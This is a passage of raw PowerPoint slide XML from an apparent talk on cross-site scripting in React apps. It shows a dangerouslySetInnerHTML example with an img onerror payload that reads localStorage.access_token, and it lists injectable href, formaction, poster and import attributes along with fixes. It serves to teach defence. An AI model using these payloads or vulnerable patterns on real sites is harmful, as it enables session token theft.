                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>  'h1'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>,                        //type</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFF00"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>{</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFF00"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>className</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFF00"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFF00"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> 'greeting'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:highlight>
                            <a:srgbClr val="FFFF00"/>
                          </a:highlight>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>,     //[props]</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>  'Hello</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> world</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>              </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>//[children]</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>);</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="20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86062677"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="5036596"/>
            <a:ext cx="8598195" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dangerouslySetInnerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>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777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"__html"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=x/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>='alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>localStorage.access_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)'&gt;"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="363427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 Injections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1414462"/>
            <a:ext cx="10972800" cy="4943807"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> – injectable dynamic links - &lt;a&gt; tag:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Use “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:” schema</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Some new HTML5 attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Formaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> – for &lt;button&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Poster – for &lt;video&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>HTML5 imports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Fixes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Stripping out “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:” schema</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-parse package</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1484183051"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8316686" y="1936967"/>
          <a:ext cx="3278053" cy="322864"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3278053">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3502760658"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>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a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>href</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>={</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>userinput</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>Link</a:t>
                      </a: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a</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206332547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68322617"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6561996" y="2755317"/>
          <a:ext cx="5032743" cy="322864"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5032743">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4127804679"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="190974">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>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button</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>form</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"name"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>formaction</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>={</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>userinput</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a: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2798937838"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7258295" y="3573667"/>
            <a:ext cx="4336444" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8B0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"import"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>={</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>userinput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2278642084"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6909325" y="4642889"/>
          <a:ext cx="4685414" cy="810544"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4685414">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="199542201"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="414876">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>var</a:t>
                      </a:r>
                      <a:r>
